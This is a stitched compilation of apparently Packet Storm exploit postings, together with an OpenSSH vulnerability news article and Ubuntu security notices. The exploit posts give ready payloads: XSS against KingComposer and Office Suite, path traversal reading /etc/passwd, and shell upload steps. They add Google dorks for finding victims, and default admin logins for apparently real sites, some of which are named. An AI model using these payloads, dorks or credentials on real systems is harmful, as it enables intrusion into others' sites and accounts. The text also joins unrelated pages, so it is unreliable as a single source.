WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

Posted Jul 25, 2023

Authored by indoushka

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 13a1ca560e74613eb2d4517f0addb6da665a264ecdfd2a0a3388354bd3480ea9

Download | Favorite | View

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,749)
*   Arbitrary (16,156)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,240)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,335)
*   DoS (23,366)
*   Encryption (2,365)
*   Exploit (51,659)
*   File Inclusion (4,213)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,756)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,644)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,139)
*   Proof of Concept (2,338)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,674)
*   Root (3,576)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,877)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,312)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,716)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,879)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,995)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,251)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,603)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,760)
*   UNIX (9,270)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

Posted Jul 24, 2023

Authored by indoushka

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | 687fc9626b0a4c7e675cd7007c558b29ceea1784dee6326f9ae2ef2465dc6ffe

Download | Favorite | View

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

    ====================================================================================================================================| # Title     : CMS Ultimate Solutions DreamSus v1.4 unrestricted file upload Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://dreamsus.com                                                                                                |  | # Dork      : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] http://127.0.0.1/spcollegejejurieduin/add_testimonial.php <==== Fill in the blanks and choose your malicious file and upload[+] http://127.0.0.1/spcollegejejurieduin/uploads/testimonial/Ev!l.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,739)
*   Arbitrary (16,155)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,238)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,364)
*   Encryption (2,365)
*   Exploit (51,634)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,666)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,637)
*   Security Tool (7,876)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,307)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,711)
*   Web (9,622)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,866)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,994)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,241)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,599)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,269)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Ultimate Solutions DreamSus 1.4 Shell Upload

Details have emerged about a now-patched flaw in OpenSSH that could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions.
"This vulnerability allows a remote attacker to potentially execute arbitrary commands on vulnerable OpenSSH's forwarded ssh-agent," Saeed Abbasi, manager of vulnerability research at Qualys, said in an analysis last week.

Details have emerged about a now-patched flaw in OpenSSH that could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions.

"This vulnerability allows a remote attacker to potentially execute arbitrary commands on vulnerable OpenSSH's forwarded ssh-agent," Saeed Abbasi, manager of vulnerability research at Qualys, said in an analysis last week.

The vulnerability is being tracked under the CVE identifier **CVE-2023-38408** (CVSS score: N/A). It impacts all versions of OpenSSH before 9.3p2.

OpenSSH is a popular connectivity tool for remote login with the SSH protocol that's used for encrypting all traffic to eliminate eavesdropping, connection hijacking, and other attacks.

Successful exploitation requires the presence of certain libraries on the victim system and that the SSH authentication agent is forwarded to an attacker-controlled system. SSH agent is a background program that maintains users' keys in memory and facilitates remote logins to a server without having to enter their passphrase again.

"While browsing through ssh-agent's source code, we noticed that a remote attacker, who has access to the remote server where Alice's ssh-agent is forwarded to, can load (dlopen()) and immediately unload (dlclose()) any shared library in /usr/lib\* on Alice's workstation (via her forwarded ssh-agent, if it is compiled with ENABLE\_PKCS11, which is the default)," Qualys explained.

The cybersecurity firm said it was able to devise a successful proof-of-concept (PoC) against default installations of Ubuntu Desktop 22.04 and 21.10, although other Linux distributions are expected to be vulnerable as well.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

It is strongly advised that users of OpenSSH update to the most recent version in order to safeguard against potential cyber threats.

Earlier this February, OpenSSH maintainers released an update to remediate a medium-severity security flaw (CVE-2023-25136, CVSS score: 6.5) that could be exploited by an unauthenticated remote attacker to modify unexpected memory locations and theoretically achieve code execution.

A subsequent release in March addressed another security issue that could be abused by means of a specifically crafted DNS response to perform an out-of-bounds read of adjacent stack data and cause a denial-of- service to the SSH client.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New OpenSSH Vulnerability Exposes Linux Systems to Remote Command Injection

Ubuntu Security Notice 6232-1 - It was discovered that wkhtmltopdf was not properly enforcing the same-origin policy when processing certain HTML files. If a user or automated system using wkhtmltopdf were tricked into processing a specially crafted HTML file, an attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6232-1  
July 20, 2023

wkhtmltopdf vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

wkhtmltopdf could be made to expose sensitive information if it opened a  
specially crafted file.

Software Description:  
- wkhtmltopdf: Command line utility to convert html to pdf using WebKit

Details:

It was discovered that wkhtmltopdf was not properly enforcing the  
same-origin policy when processing certain HTML files. If a user or  
automated system using wkhtmltopdf were tricked into processing a  
specially crafted HTML file, an attacker could possibly use this issue to  
expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
wkhtmltopdf 0.12.5-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.4-1ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.2.4-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.9.9-4ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6232-1  
CVE-2020-21365

Package Information:  
https://launchpad.net/ubuntu/+source/wkhtmltopdf/0.12.5-1ubuntu0.1

Ubuntu Security Notice USN-6232-1

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

**CMS NEXIN 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 25b10702af932a169c8f962ba428cb35c1dcfb81a0c4d0c73e21de4f9e2d2054

Download | Favorite | View

**CMS NEXIN 2.0 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS NEXIN engine v2.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : NEXIN engine v2.0                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://wlugashotelcom/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS NEXIN 2.0 Insecure Settings

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | ef0029a51004a0f4fd1207577f144340dffe6a0657f6ace9160fd98579a7d596

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings

Office Suite Premium Version v10.9.1.42602 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the filter parameter at /api?path=files.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POC# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-codePayload: <img src=a onerror=alert(1)>Parameter : applicationRequest 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527Payload : <img src=a onerror=alert(1)>Parameter: idRequest 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=searchPayload :<img src=a onerror=alert(1)>Parameter: filter

CVE-2023-38617: Office Suite Premium 10.9.1.42602 Cross Site Scripting ≈ Packet Storm

Office Suite Premium v10.9.1.42602 was discovered to contain a local file inclusion (LFI) vulnerability via the component /etc/hosts.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

CVE-2023-37601: Office Suite Premium 10.9.1.42602 Local File Inclusion ≈ Packet Storm

Ubuntu Security Notice 6239-1 - It was discovered that ECDSA Util did not properly verify certain signature values. An attacker could possibly use this issue to bypass signature verification.

==========================================================================  
Ubuntu Security Notice USN-6239-1  
July 20, 2023

ecdsautils vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

ECDSA Util could be made to accept forged signatures.

Software Description:  
- ecdsautils: ECDSA elliptic curve cryptography command line tools

Details:

It was discovered that ECDSA Util did not properly verify certain  
signature values.  
An attacker could possibly use this issue to bypass signature  
verification.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   ecdsautils 0.3.2+git20151018-2+deb10u1build0.22.04.1

Ubuntu 20.04 LTS:  
   ecdsautils 0.3.2+git20151018-2+deb10u1build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   ecdsautils 0.3.2+git20151018-2ubuntu0.18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   ecdsautils 0.3.2+git20151018-2ubuntu0.16.04.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6239-1  
   CVE-2022-24884

Package Information:  
https://launchpad.net/ubuntu/+source/ecdsautils/0.3.2+git20151018-2+deb10u1build0.22.04.1  
https://launchpad.net/ubuntu/+source/ecdsautils/0.3.2+git20151018-2+deb10u1build0.20.04.1

Tag

#ubuntu